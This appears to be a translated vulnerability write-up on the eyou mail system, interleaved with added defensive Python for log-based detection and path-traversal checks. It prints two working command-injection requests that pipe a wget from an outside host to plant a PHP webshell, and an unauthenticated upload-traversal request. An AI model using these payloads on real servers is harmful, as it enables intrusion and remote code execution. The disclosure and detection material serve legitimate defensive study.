Code Auditing: Two getshells and two interesting vulnerabilities in the eyou email system

Source: Internet
Author: User


Recently I did a penetration test on a company with a market value of more than 10 billion US dollars. One of its domains runs the Yiyou (eyou) mail system, so I looked at the Yiyou source code and found that the security of this system is still at the level of a few years ago: there are a lot of problems. I found several getshells and list two of them briefly below, then dug out two slightly more interesting vulnerabilities to share. I did not want to write a detailed analysis.
In addition, a new version of the code audit system will be released in a while; audit rules for several more vulnerability types will be added and false positives will be reduced. All the Yiyou vulnerabilities here were found automatically by the Seay source code audit system.


Command Execution 1
http://host.com/swfupload/upload_files.php?uid=|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/swfupload/a.php&domain=




Command Execution 2
 

GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=|wget+http://www.yourshell.cn/1.txt+-O+/var/eyou/apache/htdocs/grad/admin/a.php HTTP/1.1
Host: mail.host.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 0
cookie: cookie=admin 1
DNT: 1
Connection: keep-alive
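Both command executions above have the same shape: a query parameter (uid in the first, domain in the second) is passed into a shell command, so a pipe character followed by a command runs on the server. On the defending side the quickest win is to look for exactly that in the access logs. The script below is an added example, not eyou code or part of the original post; it assumes Apache combined log format, the log lines are constructed samples, and example.invalid stands in for the host the payload fetches from.

```python
"""Flag command-injection attempts against the two eyou endpoints above in
web-server access logs.  Added illustration, not eyou code.  Assumes Apache
combined log format; the log lines below are constructed samples and
example.invalid stands in for the host named in the payload."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> query parameters that the write-up shows reaching a shell command.
WATCHED = {
    "/swfupload/upload_files.php": ("uid", "domain"),
    "/admin/domain/ip_login_set/d_ip_login_get.php": ("domain",),
}

# Shell metacharacters that never belong in a user id or a mail domain.
SHELL_META = re.compile(r"[|;&`$<>\n]")

# ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: two injection attempts, one benign call, one unrelated hit.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2014:10:15:01 +0800] "GET /swfupload/upload_files.php?uid=%7Cwget+http%3A%2F%2Fexample.invalid%2F1.txt+-O+%2Fvar%2Feyou%2Fapache%2Fhtdocs%2Fswfupload%2Fa.php&domain= HTTP/1.1" 200 512
203.0.113.7 - - [10/Jun/2014:10:15:09 +0800] "GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=%7Cwget+http%3A%2F%2Fexample.invalid%2F1.txt HTTP/1.1" 200 77
198.51.100.2 - - [10/Jun/2014:10:16:00 +0800] "GET /swfupload/upload_files.php?uid=alice&domain=mail.example.invalid HTTP/1.1" 200 88
198.51.100.2 - - [10/Jun/2014:10:16:30 +0800] "GET /index.php?q=%7Cid HTTP/1.1" 200 88
"""


def find_injection_attempts(log_text):
    """Return one finding per (request, parameter) whose decoded value carries
    shell metacharacters on a watched endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a request line we understand
        parts = urlsplit(m["target"])
        params = WATCHED.get(parts.path)
        if not params:
            continue                      # endpoint not in scope
        # parse_qs percent-decodes and turns '+' into spaces, which is what
        # the application (and the shell behind it) would have seen.
        query = parse_qs(parts.query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                if SHELL_META.search(value):
                    findings.append({
                        "ip": m["ip"], "time": m["ts"], "path": parts.path,
                        "param": name, "value": value, "status": int(m["status"]),
                    })
    return findings


if __name__ == "__main__":
    for f in find_injection_attempts(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']!r}")
```

Run against a real log, the two sample attempts are the only lines reported; the benign upload call and the unrelated /index.php request are ignored because the rule is scoped to the two endpoints and the parameters that actually reach a shell. The same rule, turned around, is the application-side fix: validate uid and domain against a strict allowlist of characters before they are used, and wrap anything that must go to a shell in escapeshellarg().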

Arbitrary File Upload
swfupload/upload_files.php?uid=admin&token=youtoken/../../



In this case you can upload any file directly without logging in. On Linux, however, the is_dir() function checks whether a path is a directory, and when ../ is used to step back into a directory every directory in the path must exist; on Windows a path with a non-existent component may still pass. Whether that is a system quirk or a PHP quirk, I will need more time to look into it.
Look at the figure and you will understand.



Many files begin with an include whose path is built from the Host field of the HTTP header. By default this Host value can be forged on websites, but it cannot contain a slash, since that does not belong in a domain name; otherwise the server returns a 400 error. Therefore only files in the same directory can be included here.
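The upload traversal and the Host-header include above are both cases of untrusted input being joined onto a fixed directory, and the write-up's is_dir() observation shows why an existence check is the wrong tool: it depends on what is already on disk. The following is an added example, not eyou code or part of the original post; it checks containment lexically, so a traversal through directories that do not exist is caught the same way on every platform, and it reduces a Host header to an allowlisted hostname before it is ever used in a path. The root directories and the allowlist are assumed values.

```python
"""Containment checks for the two path problems above: a traversal sequence in
a request parameter (the upload case) and a Host header used to build an
include path.  Added illustration, not eyou code.  The root directories and
the allowlist are assumed values."""
import os
import re

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$"
)


def lexically_escapes(root, untrusted):
    """True if joining untrusted onto root lands outside root.

    The decision is made on the normalised string alone, so it does not matter
    whether the intermediate directories exist.  That is the point of the
    Linux/Windows difference above: a check that asks the filesystem (is_dir(),
    or PHP's realpath(), which returns false for a path that does not exist)
    behaves differently depending on what is already on disk; a lexical check
    does not.  An absolute untrusted value replaces root inside os.path.join
    and is therefore caught as well."""
    root = os.path.abspath(root)
    target = os.path.normpath(os.path.join(root, untrusted))
    # commonpath compares whole components, so /root2/x is not inside /root.
    return os.path.commonpath([root, target]) != root


def safe_join(root, untrusted):
    """Join untrusted onto root, refusing anything that escapes it."""
    if lexically_escapes(root, untrusted):
        raise ValueError(f"path escapes {root!r}: {untrusted!r}")
    return os.path.normpath(os.path.join(os.path.abspath(root), untrusted))


def include_path_for_host(config_root, host_header, allowed_hosts):
    """Map a Host header to the per-domain include file, or None.

    The header value is reduced to a hostname and checked against an allowlist
    of names this installation actually serves before it is used in a path, so
    a forged Host never reaches the filesystem, with or without a slash."""
    host = host_header.split(":", 1)[0].strip().lower()  # drop any :port
    if not HOSTNAME_RE.match(host) or host not in allowed_hosts:
        return None
    return safe_join(config_root, host + ".php")


if __name__ == "__main__":
    user_root = "/var/eyou/uploads/admin"   # assumed layout: one directory per uid
    for token in ("youtoken/a.dat", "youtoken/../../", "../admin2/x", "/etc/passwd"):
        print(f"{token!r:20} escapes={lexically_escapes(user_root, token)}")
    allowed = {"mail.example.invalid"}
    for h in ("mail.example.invalid:443", "evil.invalid", "../x"):
        print(f"{h!r:28} -> {include_path_for_host('/var/eyou/conf', h, allowed)}")
```

The token value "youtoken/../../" from the upload request above is rejected even though no "admin/youtoken" directory exists, which is exactly the case an is_dir()-based check gets wrong on one platform and right on the other. For the include, the allowlist makes the question of slashes in the Host header irrelevant: a value that is not one of the domains the installation serves is never turned into a path at all.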
